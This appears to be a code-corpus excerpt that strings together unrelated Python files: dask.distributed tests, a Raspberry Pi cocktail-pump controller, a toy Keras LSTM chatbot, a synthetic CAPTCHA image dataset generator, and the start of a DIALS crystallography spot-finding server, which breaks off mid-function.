scale = varying([ZeroDivisionError("one"), ZeroDivisionError("two"), 2, 2])
def flaky_double(x):
return scale() * x
# A reliable double function.
def reliable_double(x):
return 2 * x
x = da.ones(10, chunks=(5,))
# The later annotations should not override the earlier annotations
with dask.annotate(retries=2):
y = x.map_blocks(flaky_double, meta=np.array((), dtype=float))
with dask.annotate(retries=0):
z = y.map_blocks(reliable_double, meta=np.array((), dtype=float))
with dask.config.set(optimization__fuse__active=False):
z = await c.compute(z)
assert_eq(z, np.ones(10) * 4.0)
@gen_cluster(
client=True,
nthreads=[
("127.0.0.1", 1),
("127.0.0.1", 1, {"resources": {"GPU": 1}}),
],
)
async def test_annotations_resources(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(resources={"GPU": 1}):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all([{"GPU": 1} == ts.resource_restrictions for ts in s.tasks.values()])
assert all([{"resources": {"GPU": 1}} == ts.annotations for ts in s.tasks.values()])
@gen_cluster(
client=True,
nthreads=[
("127.0.0.1", 1),
("127.0.0.1", 1, {"resources": {"GPU": 1}}),
],
)
async def test_annotations_resources_culled(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((2, 2, 2), chunks=1)
with dask.annotate(resources={"GPU": 1}):
y = x.map_blocks(lambda x0: x0, meta=x._meta)
z = y[0, 0, 0]
(z,) = c.compute([z], optimize_graph=False)
await z
# it worked!
@gen_cluster(client=True)
async def test_annotations_loose_restrictions(c, s, a, b):
da = pytest.importorskip("dask.array")
# Eventually fails if allow_other_workers=False
with dask.annotate(workers=["fake"], allow_other_workers=True):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(not ts.worker_restrictions for ts in s.tasks.values())
assert all({"fake"} == ts.host_restrictions for ts in s.tasks.values())
assert all(
[
{"workers": ("fake",), "allow_other_workers": True} == ts.annotations
for ts in s.tasks.values()
]
)
@gen_cluster(client=True)
async def test_workers_collection_restriction(c, s, a, b):
da = pytest.importorskip("dask.array")
future = c.compute(da.arange(10), workers=a.address)
await future
assert a.data and not b.data
@gen_cluster(client=True, nthreads=[("127.0.0.1", 0)])
async def test_get_client_functions_spawn_clusters(c, s, a):
# see gh4565
scheduler_addr = c.scheduler.address
def f(x):
with LocalCluster(
n_workers=1,
processes=False,
dashboard_address=":0",
worker_dashboard_address=":0",
) as cluster2:
with Client(cluster2) as c1:
c2 = get_client()
c1_scheduler = c1.scheduler.address
c2_scheduler = c2.scheduler.address
assert c1_scheduler != c2_scheduler
assert c2_scheduler == scheduler_addr
await c.gather(c.map(f, range(2)))
await a.close()
c_default = default_client()
assert c is c_default
def test_computation_code_walk_frames():
test_function_code = inspect.getsource(test_computation_code_walk_frames)
code = Client._get_computation_code()
assert test_function_code == code
def nested_call():
return Client._get_computation_code()
assert nested_call() == inspect.getsource(nested_call)
with pytest.raises(TypeError, match="Ignored modules must be a list"):
with dask.config.set(
{"distributed.diagnostics.computations.ignore-modules": "test_client"}
):
code = Client._get_computation_code()
with dask.config.set(
{"distributed.diagnostics.computations.ignore-modules": ["test_client"]}
):
import sys
upper_frame_code = inspect.getsource(sys._getframe(1))
code = Client._get_computation_code()
assert code == upper_frame_code
assert nested_call() == upper_frame_code
def test_computation_object_code_dask_compute(client):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = x.sum().compute()
y = future
test_function_code = inspect.getsource(test_computation_object_code_dask_compute)
def fetch_comp_code(dask_scheduler):
computations = list(dask_scheduler.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
return comp.code[0]
code = client.run_on_scheduler(fetch_comp_code)
assert code == test_function_code
def test_computation_object_code_not_available(client):
np = pytest.importorskip("numpy")
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
df = pd.DataFrame({"a": range(10)})
ddf = dd.from_pandas(df, npartitions=3)
result = np.where(ddf.a > 4)
def fetch_comp_code(dask_scheduler):
computations = list(dask_scheduler.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
return comp.code[0]
code = client.run_on_scheduler(fetch_comp_code)
assert code == "<Code not available>"
@gen_cluster(client=True)
async def test_computation_object_code_dask_persist(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = x.sum().persist()
await future
test_function_code = inspect.getsource(
test_computation_object_code_dask_persist.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_submit_simple(c, s, a, b):
def func(x):
return x
fut = c.submit(func, 1)
await fut
test_function_code = inspect.getsource(
test_computation_object_code_client_submit_simple.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_submit_list_comp(c, s, a, b):
def func(x):
return x
futs = [c.submit(func, x) for x in range(10)]
await c.gather(futs)
test_function_code = inspect.getsource(
test_computation_object_code_client_submit_list_comp.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
# Code is deduplicated
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_submit_dict_comp(c, s, a, b):
def func(x):
return x
futs = {x: c.submit(func, x) for x in range(10)}
await c.gather(futs)
test_function_code = inspect.getsource(
test_computation_object_code_client_submit_dict_comp.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
# Code is deduplicated
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_map(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = await future
test_function_code = inspect.getsource(
test_computation_object_code_client_map.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_compute(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = await future
test_function_code = inspect.getsource(
test_computation_object_code_client_compute.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True, Worker=Nanny)
async def test_upload_directory(c, s, a, b, tmp_path):
from dask.distributed import UploadDirectory
files = set(os.listdir())
with open(tmp_path / "foo.py", "w") as f:
f.write("x = 123")
with open(tmp_path / "bar.py", "w") as f:
f.write("from foo import x")
plugin = UploadDirectory(tmp_path, restart=True, update_path=True)
await c.register_worker_plugin(plugin)
[name] = a.plugins
assert os.path.split(tmp_path)[-1] in name
def f():
import bar
return bar.x
results = await c.run(f)
assert results[a.worker_address] == 123
assert results[b.worker_address] == 123
async with Nanny(s.address, local_directory=tmp_path / "foo", name="foo") as n:
results = await c.run(f)
assert results[n.worker_address] == 123
assert files == set(os.listdir()) # no change
@gen_cluster(client=True)
async def test_exception_text(c, s, a, b):
def bad(x):
raise Exception(x)
future = c.submit(bad, 123)
await wait(future)
ts = s.tasks[future.key]
assert isinstance(ts.exception_text, str)
assert "123" in ts.exception_text
assert "Exception(x)" in ts.traceback_text
assert "bad" in ts.traceback_text
@gen_cluster(client=True)
async def test_async_task(c, s, a, b):
async def f(x):
return x + 1
future = c.submit(f, 10)
result = await future
assert result == 11
@gen_cluster(client=True, nthreads=[("", 1)])
async def test_events_subscribe_topic(c, s, a):
log = []
def user_event_handler(event):
log.append(event)
c.subscribe_topic("test-topic", user_event_handler)
while not s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
a.log_event("test-topic", {"important": "event"})
while len(log) != 1:
await asyncio.sleep(0.01)
time_, msg = log[0]
assert isinstance(time_, float)
assert msg == {"important": "event"}
c.unsubscribe_topic("test-topic")
while s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
a.log_event("test-topic", {"forget": "me"})
while len(s.events["test-topic"]) == 1:
await asyncio.sleep(0.01)
assert len(log) == 1
async def async_user_event_handler(event):
log.append(event)
await asyncio.sleep(0)
c.subscribe_topic("test-topic", async_user_event_handler)
while not s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
a.log_event("test-topic", {"async": "event"})
while len(log) == 1:
await asyncio.sleep(0.01)
assert len(log) == 2
time_, msg = log[1]
assert isinstance(time_, float)
assert msg == {"async": "event"}
# Even though the middle event was not subscribed to, the scheduler still
# knows about all and we can retrieve them
all_events = await c.get_events(topic="test-topic")
assert len(all_events) == 3
@gen_cluster(client=True, nthreads=[("", 1)])
async def test_events_all_servers_use_same_channel(c, s, a):
"""Ensure that logs from all server types (scheduler, worker, nanny)
and the clients themselves arrive"""
log = []
def user_event_handler(event):
log.append(event)
c.subscribe_topic("test-topic", user_event_handler)
while not s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
async with Nanny(s.address) as n:
a.log_event("test-topic", "worker")
n.log_event("test-topic", "nanny")
s.log_event("test-topic", "scheduler")
await c.log_event("test-topic", "client")
while not len(log) == 4 == len(set(log)):
await asyncio.sleep(0.1)
@gen_cluster(client=True, nthreads=[])
async def test_events_unsubscribe_raises_if_unknown(c, s):
with pytest.raises(ValueError, match="No event handler known for topic unknown"):
c.unsubscribe_topic("unknown")
@gen_cluster(client=True)
async def test_log_event_warn(c, s, a, b):
def foo():
get_worker().log_event(["foo", "warn"], "Hello!")
with pytest.warns(Warning, match="Hello!"):
await c.submit(foo)
@gen_cluster(client=True)
async def test_log_event_warn_dask_warns(c, s, a, b):
from dask.distributed import warn
def foo():
warn("Hello!")
with pytest.warns(Warning, match="Hello!"):
await c.submit(foo)
@gen_cluster(client=True, Worker=Nanny)
async def test_print(c, s, a, b, capsys):
from dask.distributed import print
def foo():
print("Hello!", 123, sep=":")
await c.submit(foo)
out, err = capsys.readouterr()
assert "Hello!:123" in out
@gen_cluster(client=True, Worker=Nanny)
async def test_print_non_msgpack_serializable(c, s, a, b, capsys):
from dask.distributed import print
def foo():
print(object())
await c.submit(foo)
out, err = capsys.readouterr()
assert "<object object at" in out
def test_print_simple(capsys):
from dask.distributed import print
print("Hello!", 123, sep=":")
out, err = capsys.readouterr()
assert "Hello!:123" in out
|
bartender.py | import gaugette.ssd1306
import gaugette.platform
import gaugette.gpio
import time
import sys
import RPi.GPIO as GPIO
import json
import threading
import traceback
import board
import neopixel
from menu import MenuItem, Menu, Back, MenuContext, MenuDelegate
from drinks import drink_list, drink_options
GPIO.setmode(GPIO.BCM)
SCREEN_WIDTH = 128
SCREEN_HEIGHT = 64
LEFT_BTN_PIN = 13
LEFT_PIN_BOUNCE = 1000
RIGHT_BTN_PIN = 5
RIGHT_PIN_BOUNCE = 2000
OLED_RESET_PIN = 15
OLED_DC_PIN = 16
num_pixels = 57
ORDER = neopixel.GRB
FLOW_RATE = 50.0/100.0
screenItem = 'IU-SUCKS'
pixel_pin = board.D18
# setup pixels:
pixels = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=0.3, auto_write=False, pixel_order=ORDER)
def wheel(pos):
# Input a value 0 to 255 to get a color value.
# The colours are a transition r - g - b - back to r.
if pos < 0 or pos > 255:
r = g = b = 0
elif pos < 85:
r = int(pos * 3)
g = int(255 - pos * 3)
b = 0
elif pos < 170:
pos -= 85
r = int(255 - pos * 3)
g = 0
b = int(pos * 3)
else:
pos -= 170
r = 0
g = int(pos * 3)
b = int(255 - pos * 3)
return (r, g, b) #if ORDER in (neopixel.RGB, neopixel.GRB) else (r, g, b, 0)
def rainbow_cycle(wait):
for j in range(255):
for i in range(num_pixels):
pixel_index = (i * 256 // num_pixels) + j
pixels[i] = wheel(pixel_index & 255)
pixels.show()
time.sleep(wait)
class Bartender(MenuDelegate):
def __init__(self):
self.running = False
# set the oled screen height
self.screen_width = SCREEN_WIDTH
self.screen_height = SCREEN_HEIGHT
self.btn1Pin = LEFT_BTN_PIN
self.btn2Pin = RIGHT_BTN_PIN
# configure interrups for buttons
GPIO.setup(self.btn1Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.btn2Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
# configure screen
spi_bus = 0
spi_device = 0
gpio = gaugette.gpio.GPIO()
spi = gaugette.spi.SPI(spi_bus, spi_device)
# Very important... This lets py-gaugette 'know' what pins to use in order to reset the display
self.led = gaugette.ssd1306.SSD1306(gpio, spi, reset_pin=OLED_RESET_PIN, dc_pin=OLED_DC_PIN, rows=self.screen_height, cols=self.screen_width) # Change rows & cols values depending on your display dimensions.
self.led.begin()
self.led.clear_display()
self.led.display()
self.led.invert_display()
time.sleep(0.5)
self.led.normal_display()
time.sleep(0.5)
# load the pump configuration from file
self.pump_configuration = Bartender.readPumpConfiguration()
for pump in self.pump_configuration.keys():
GPIO.setup(self.pump_configuration[pump]["pin"], GPIO.OUT, initial=GPIO.HIGH)
# Here's how to control the strip from any two GPIO pins:
#datapin = NEOPIXEL_DATA_PIN
#clockpin = NEOPIXEL_CLOCK_PIN
#self.strip = Adafruit_DotStar(self.numpixels, datapin, clockpin)
#self.strip.begin() # Initialize pins for output
#self.strip.setBrightness(NEOPIXEL_BRIGHTNESS) # Limit brightness to ~1/4 duty cycle
# turn everything off
pixels.fill((255,100,9))
pixels.show()
print("Done initializing")
@staticmethod
def readPumpConfiguration():
return json.load(open('pump_config.json'))
@staticmethod
def writePumpConfiguration(configuration):
with open("pump_config.json", "w") as jsonFile:
json.dump(configuration, jsonFile)
def startInterrupts(self):
GPIO.add_event_detect(self.btn1Pin, GPIO.FALLING, callback=self.left_btn, bouncetime=LEFT_PIN_BOUNCE)
GPIO.add_event_detect(self.btn2Pin, GPIO.FALLING, callback=self.right_btn, bouncetime=RIGHT_PIN_BOUNCE)
def stopInterrupts(self):
GPIO.remove_event_detect(self.btn1Pin)
GPIO.remove_event_detect(self.btn2Pin)
def atExit(self):
pixels.fill((0, 0, 0))
pixels.show
GPIO.cleanup()
exit(0)
def buildMenu(self, drink_list, drink_options):
# create a new main menu
m = Menu("Main Menu")
# add drink options
drink_opts = []
for d in drink_list:
drink_opts.append(MenuItem('drink', d["name"], {"ingredients": d["ingredients"]}))
configuration_menu = Menu("Configure")
# add pump configuration options
pump_opts = []
for p in sorted(self.pump_configuration.keys()):
config = Menu(self.pump_configuration[p]["name"])
# add fluid options for each pump
for opt in drink_options:
# star the selected option
selected = "*" if opt["value"] == self.pump_configuration[p]["value"] else ""
config.addOption(MenuItem('pump_selection', opt["name"], {"key": p, "value": opt["value"], "name": opt["name"]}))
# add a back button so the user can return without modifying
config.addOption(Back("Back"))
config.setParent(configuration_menu)
pump_opts.append(config)
# add pump menus to the configuration menu
configuration_menu.addOptions(pump_opts)
# add a back button to the configuration menu
configuration_menu.addOption(Back("Back"))
# adds an option that cleans all pumps to the configuration menu
configuration_menu.addOption(MenuItem('clean', 'Clean'))
configuration_menu.setParent(m)
m.addOptions(drink_opts)
m.addOption(configuration_menu)
# create a menu context
self.menuContext = MenuContext(m, self)
def filterDrinks(self, menu):
"""
Removes any drinks that can't be handled by the pump configuration
"""
for i in menu.options:
if (i.type == "drink"):
i.visible = False
ingredients = i.attributes["ingredients"]
presentIng = 0
for ing in ingredients.keys():
for p in self.pump_configuration.keys():
if (ing == self.pump_configuration[p]["value"]):
presentIng += 1
if (presentIng == len(ingredients.keys())):
i.visible = True
elif (i.type == "menu"):
self.filterDrinks(i)
def selectConfigurations(self, menu):
"""
Adds a selection star to the pump configuration option
"""
for i in menu.options:
if (i.type == "pump_selection"):
key = i.attributes["key"]
if (self.pump_configuration[key]["value"] == i.attributes["value"]):
i.name = "%s %s" % (i.attributes["name"], "*")
else:
i.name = i.attributes["name"]
elif (i.type == "menu"):
self.selectConfigurations(i)
def prepareForRender(self, menu):
self.filterDrinks(menu)
self.selectConfigurations(menu)
return True
def menuItemClicked(self, menuItem):
if (menuItem.type == "drink"):
self.makeDrink(menuItem.name, menuItem.attributes["ingredients"])
return True
elif(menuItem.type == "pump_selection"):
self.pump_configuration[menuItem.attributes["key"]]["value"] = menuItem.attributes["value"]
Bartender.writePumpConfiguration(self.pump_configuration)
return True
elif(menuItem.type == "clean"):
self.clean()
return True
return False
def clean(self):
waitTime = 20
pumpThreads = []
# cancel any button presses while the drink is being made
# self.stopInterrupts()
self.running = True
for pump in self.pump_configuration.keys():
pump_t = threading.Thread(target=self.pour, args=(self.pump_configuration[pump]["pin"], waitTime))
pumpThreads.append(pump_t)
# start the pump threads
for thread in pumpThreads:
thread.start()
# start the progress bar
self.progressBar(waitTime)
# wait for threads to finish
for thread in pumpThreads:
thread.join()
# show the main menu
self.menuContext.showMenu()
# sleep for a couple seconds to make sure the interrupts don't get triggered
time.sleep(2);
# reenable interrupts
# self.startInterrupts()
self.running = False
def displayMenuItem(self, menuItem):
global screenItem
screenItem = menuItem
print(menuItem.name)
self.led.clear_display()
self.led.draw_text2(0,20,menuItem.name,2)
self.led.display()
def cycleLights(self):
t = threading.currentThread()
head = 0 # Index of first 'on' pixel
tail = -10 # Index of last 'off' pixel
color = 0xFF0000 # 'On' color (starts red)
while(getattr(t, "do_run", True)):
rainbow_cycle(0.001)
# pixels[head] = color # Turn on 'head' pixel
# pixels[tail] = (0, 0, 0) # Turn off 'tail'
# pixels.show() # Refresh strip
# time.sleep(1.0 / 50) # Pause 20 milliseconds (~50 fps)
# head += 1 # Advance head position
# if(head >= num_pixels): # Off end of strip?
# head = 0 # Reset to start
# color >>= 8 # Red->green->blue->black
# if(color == 0): color = 0xFF0000 # If black, reset to red
#
# tail += 1 # Advance tail position
# if(tail >= num_pixels): tail = 0 # Off end? Reset
def lightsEndingSequence(self):
pixels.fill((0,0,0))
pixels.show()
# make lights green
for i in range(num_pixels):
pixels[i] = (0, 255, 15)
pixels.show()
time.sleep(0.03)
for i in range(num_pixels):
pixels[i] = (0, 0, 0)
pixels.show()
time.sleep(0.03)
# pixels.fill((0, 255, 0))
# pixels.show()
# x = 5
#time.sleep(5)
# turn lights gold
for i in range(0, 101):
pixels.fill((int(255 * (i/100)), int(100 * (i/100)), int(9 * (i/100))))
time.sleep(0.01)
pixels.show()
def pour(self, pin, waitTime):
GPIO.output(pin, GPIO.LOW)
time.sleep(waitTime)
GPIO.output(pin, GPIO.HIGH)
def progressBar(self, waitTime):
interval = waitTime / 100.0
for x in range(1, 101):
self.led.clear_display()
self.updateProgressBar(x, y=35)
self.led.display()
time.sleep(interval)
def makeDrink(self, drink, ingredients):
# cancel any button presses while the drink is being made
# self.stopInterrupts()
self.running = True
# launch a thread to control lighting
lightsThread = threading.Thread(target=self.cycleLights)
lightsThread.start()
# Parse the drink ingredients and spawn threads for pumps
maxTime = 0
pumpThreads = []
for ing in ingredients.keys():
for pump in self.pump_configuration.keys():
if ing == self.pump_configuration[pump]["value"]:
waitTime = ingredients[ing] * FLOW_RATE
if (waitTime > maxTime):
maxTime = waitTime
pump_t = threading.Thread(target=self.pour, args=(self.pump_configuration[pump]["pin"], waitTime))
pumpThreads.append(pump_t)
# start the pump threads
for thread in pumpThreads:
thread.start()
# start the progress bar
self.progressBar(maxTime)
# wait for threads to finish
for thread in pumpThreads:
thread.join()
# show the main menu
self.menuContext.showMenu()
# stop the light thread
lightsThread.do_run = False
lightsThread.join()
# show the ending sequence lights
self.lightsEndingSequence()
# sleep for a couple seconds to make sure the interrupts don't get triggered
time.sleep(2);
# reenable interrupts
# self.startInterrupts()
self.running = False
def left_btn(self, ctx):
if not self.running:
self.menuContext.advance()
def right_btn(self, ctx):
if not self.running:
self.menuContext.select()
def updateProgressBar(self, percent, x=15, y=15):
height = 10
width = self.screen_width-2*x
for w in range(0, width):
self.led.draw_pixel(w + x, y)
self.led.draw_pixel(w + x, y + height)
for h in range(0, height):
self.led.draw_pixel(x, h + y)
self.led.draw_pixel(self.screen_width-x, h + y)
for p in range(0, percent):
p_loc = int(p/100.0*width)
self.led.draw_pixel(x + p_loc, h + y)
# def run(self):
# self.startInterrupts()
# # main loop
# try:
# while True:
# time.sleep(0.1)
#
# except KeyboardInterrupt:
# GPIO.cleanup() # clean up GPIO on CTRL+C exit
# GPIO.cleanup() # clean up GPIO on normal exit
#
# traceback.print_exc()
bartender = Bartender()
bartender.buildMenu(drink_list, drink_options)
#bartender.run()
|
main2.py | # encoding: utf-8
#这里放置主程序以及IO
from numpy import *
from utils.tools import loadvoc
from keras.models import Sequential,load_model,Model
from keras.layers import Input, Reshape,Embedding, LSTM, Dense, merge, RepeatVector,TimeDistributed,Masking,Activation
from keras.optimizers import SGD,Adam
from keras.utils.np_utils import to_categorical
import threading
import time
import os
rlock = threading.RLock()
#编码与解码文字
#i2c, c2i = loadvoc()
ss="qwertyuiopasdfghjkl'zxcvbnm,.-?! "
i2c={}
c2i={}
for i in range(len(ss)):
i2c[i+1]=ss[i]
c2i[ss[i]]=i+1
#模型参数设置
VOC = len(i2c) #最大词汇数目
SEN = 100 #句子最大长度
M = 20 # 短期记忆
INPUT=['' for x in range(M)] #输入的句子缓存
SPEAK_OUTPUT='' #输出的言语缓存
def store(s,M):
if not (s == M[0] and s == M[1]):
M1=[s]
M1.extend(M[0:-1])
return M1
else:
return M
def get(M):
L=len(M)-mod(len(M),2)
MY=[]
MX=[]
for i in range(0,L,2):
MX.append(M[i+1])
MY.append(M[i])
return MX,MY
#将句子转化成数字
def s2i(S,SEN=SEN):
N=len(S)
idx=zeros([N,SEN,1],dtype=int32)
for n in range(N):
s=S[n]
for i in range(min(SEN,len(s))):
idx[n,i,0]=c2i.get(s[i],0)
return idx
def i2s(idx):
N=len(idx)
S=[]
for n in range(N):
s=''
for i in idx[n,:,0]:
if i>0:
s+=i2c.get(int(round(i)),'')
S.append(s)
return S
#定义主模型
model = Sequential()
model.add(LSTM(input_dim=1, output_dim=64, return_sequences=True))
model.add(LSTM(128, return_sequences=False))
model.add(Dense(output_dim=SEN))
model.add(Reshape((SEN,1)))
model.add(Activation('linear'))
print('compiling...')
model.compile(loss='mse', optimizer='rmsprop')
print('compiled')
#模型训练-循环控制
POWER_OFF = False
SPEAK=False
def run():
global INPUT,SPEAK_OUTPUT,POWER_OFF,SPEAK
while not POWER_OFF:
#读取输入数据进行训练
X,Y=get(INPUT)
X=s2i(X)
Y=s2i(Y)
# print('thinking...')
model.fit(X,Y,
nb_epoch=1, batch_size=len(X),verbose=0)
yy=model.predict(X[0:1],verbose=0)
SPEAK_OUTPUT=i2s(yy)
if SPEAK:
print('\nA: '+SPEAK_OUTPUT[0]+'\n')
SPEAK=False
time.sleep(0.5)
def say():
global INPUT,SPEAK_OUTPUT,POWER_OFF,SPEAK
while not POWER_OFF:
if not SPEAK:
a=raw_input('Q: ').lower()
if a == u'end':
POWER_OFF = a
model.save('baby-model.h5')
else:
SPEAK=True
INPUT=store(a,INPUT)
threading.Thread(target = run, args = (), name = 'run').start()
threading.Thread(target = say, args = (), name = 'say').start()
|
generate_dataset.py | """
**********************************************************************
**********************************************************************
** author: ZSAIm
** email: zzsaim@163.com
** github: https://github.com/ZSAIm/CNN-Get-Captcha
**
** programming by python 3.5
**
** 9.9-2018
**********************************************************************
**********************************************************************
"""
import random
from wheezy.captcha.image import captcha, background, noise, rotate, text, curve, warp, offset, smooth
from constant import *
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
import img_process
from io import BytesIO
import threading
import os
import time
FONT_PATH = 'arialbd.ttf'
THRESHOLD = 170
NUM_SHARDS = 5
INSTANCES_PER_SHARD = 10000
global_count = 0
count_lock = threading.Lock()
def random_chars(num):
chars = ''
for i in range(num):
chars += CHAR_SET[random.randint(0, len(CHAR_SET) - 1)]
return chars
def generate_image(num):
captcha_model = captcha(width=IMAGE_WIDTH, height=IMAGE_HEIGHT, drawings=[
background(color='#FFFFFF'),
text(font_sizes=[19, 20, 21, 22],
fonts=[FONT_PATH],
drawings=[
rotate(angle=15),
offset(0.10, 0.10)
],
start_x=0,
start_y=0,
squeeze_factor=0.88),
])
label = random_chars(num)
imgsrc = captcha_model(label)
image = imgsrc.convert('L')
imgpx = image.load()
img_process.binary(image, imgpx, THRESHOLD + random.randint(-20, 15))
img_process.clear_noise(image, imgpx)
# image_array = np.array(image)
# plt.imshow(image_array)
fp = BytesIO()
image.save(fp, 'JPEG')
return fp.getvalue(), label
def batch_dump():
threads = []
max_thread = 20
for i in range(NUM_SHARDS):
while True:
threads = list(filter(lambda x: x.isAlive() is True, threads))
time.sleep(0.2)
if global_count % 1000 == 0:
print(global_count)
if len(threads) < max_thread:
break
thd = threading.Thread(target=image_dump, args=(i,))
threads.append(thd)
thd.start()
def image_dump(index_shard):
global global_count, count_lock
tf_writer = tf.python_io.TFRecordWriter(os.path.join(DATA_SET_PATH,
TFRECORD_NAME % (index_shard, NUM_SHARDS)))
for i in range(INSTANCES_PER_SHARD):
raw_img, label_str = generate_image(4)
int_label = 0
for j, k in enumerate(label_str):
int_label += CHAR_SET.index(k) * (len(CHAR_SET) ** j)
example = tf.train.Example(features=tf.train.Features(
feature={
'int_label': tf.train.Feature(int64_list=tf.train.Int64List(value=[int_label])),
'raw_image': tf.train.Feature(bytes_list=tf.train.BytesList(value=[raw_img])),
}))
tf_writer.write(example.SerializeToString())
with count_lock:
global_count += 1
tf_writer.close()
if __name__ == '__main__':
batch_dump()
|
find_spots_server.py | from __future__ import absolute_import, division, print_function
from future import standard_library
standard_library.install_aliases()
import http.server as server_base
import json
import logging
import sys
import time
import urllib.parse
from multiprocessing import Process
import libtbx.phil
from dials.util import Sorry
logger = logging.getLogger("dials.command_line.find_spots_server")
help_message = """\
A client/server version of dials.find_spots with additional analysis including
estimation of resolution limits. Intended for quick feedback of image quality
during grid scans and data collections.
On the server machine::
dials.find_spots_server [nproc=8] [port=1234]
On the client machine::
dials.find_spots_client [host=hostname] [port=1234] [nproc=8] /path/to/image.cbf
The client will return a short xml string indicating the number of spots found
and several estimates of the resolution limit.
e.g.::
<response>

<spot_count>352</spot_count>
<spot_count_no_ice>263</spot_count_no_ice>
<d_min>1.46</d_min>
<d_min_method_1>1.92</d_min_method_1>
<d_min_method_2>1.68</d_min_method_2>
<total_intensity>56215</total_intensity>
</response>
* ``spot_count`` is the total number of spots found in given image
* ``spot_count_no_ice`` is the number of spots found excluding those at resolutions
where ice rings may be found
* ``d_min_method_1`` is equivalent to distl's resolution estimate method 1
* ``d_min_method_2`` is equivalent to distl's resolution estimate method 2
* ``total_intensity`` is the total intensity of all strong spots excluding those
at resolutions where ice rings may be found
Any valid ``dials.find_spots`` parameter may be passed to
``dials.find_spots_client``, e.g.::
dials.find_spots_client /path/to/image.cbf min_spot_size=2 d_min=2
To stop the server::
dials.find_spots_client stop [host=hostname] [port=1234]
"""
stop = False
def work(filename, cl=None):
if cl is None:
cl = []
phil_scope = libtbx.phil.parse(
"""\
ice_rings {
filter = True
.type = bool
width = 0.004
.type = float(value_min=0.0)
}
index = False
.type = bool
integrate = False
.type = bool
indexing_min_spots = 10
.type = int(value_min=1)
"""
)
interp = phil_scope.command_line_argument_interpreter()
params, unhandled = interp.process_and_fetch(
cl, custom_processor="collect_remaining"
)
filter_ice = params.extract().ice_rings.filter
ice_rings_width = params.extract().ice_rings.width
index = params.extract().index
integrate = params.extract().integrate
indexing_min_spots = params.extract().indexing_min_spots
from dxtbx.model.experiment_list import ExperimentListFactory
from dials.array_family import flex
from dials.command_line.find_spots import phil_scope as find_spots_phil_scope
interp = find_spots_phil_scope.command_line_argument_interpreter()
phil_scope, unhandled = interp.process_and_fetch(
unhandled, custom_processor="collect_remaining"
)
logger.info("The following spotfinding parameters have been modified:")
logger.info(find_spots_phil_scope.fetch_diff(source=phil_scope).as_str())
params = phil_scope.extract()
# no need to write the hot mask in the server/client
params.spotfinder.write_hot_mask = False
experiments = ExperimentListFactory.from_filenames([filename])
t0 = time.time()
reflections = flex.reflection_table.from_observations(experiments, params)
t1 = time.time()
logger.info("Spotfinding took %.2f seconds" % (t1 - t0))
from dials.algorithms.spot_finding import per_image_analysis
imageset = experiments.imagesets()[0]
reflections.centroid_px_to_mm(experiments)
reflections.map_centroids_to_reciprocal_space(experiments)
stats = per_image_analysis.stats_for_reflection_table(
reflections, filter_ice=filter_ice, ice_rings_width=ice_rings_width
)._asdict()
t2 = time.time()
logger.info("Resolution analysis took %.2f seconds" % (t2 - t1))
if index and stats["n_spots_no_ice"] > indexing_min_spots:
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
from dials.algorithms.indexing import indexer
from dials.command_line.index import phil_scope as index_phil_scope
interp = index_phil_scope.command_line_argument_interpreter()
phil_scope, unhandled = interp.process_and_fetch(
unhandled, custom_processor="collect_remaining"
)
logger.info("The following indexing parameters have been modified:")
index_phil_scope.fetch_diff(source=phil_scope).show()
params = phil_scope.extract()
if (
imageset.get_goniometer() is not None
and imageset.get_scan() is not None
and imageset.get_scan().is_still()
):
imageset.set_goniometer(None)
imageset.set_scan(None)
try:
idxr = indexer.Indexer.from_parameters(
reflections, experiments, params=params
)
indexing_results = []
idxr.index()
indexed_sel = idxr.refined_reflections.get_flags(
idxr.refined_reflections.flags.indexed
)
indexed_sel &= ~(
idxr.refined_reflections.get_flags(
idxr.refined_reflections.flags.centroid_outlier
)
)
for i_expt, expt in enumerate(idxr.refined_experiments):
sel = idxr.refined_reflections["id"] == i_expt
sel &= indexed_sel
indexing_results.append(
{
"crystal": expt.crystal.to_dict(),
"n_indexed": sel.count(True),
"fraction_indexed": sel.count(True) / sel.size(),
}
)
stats["lattices"] = indexing_results
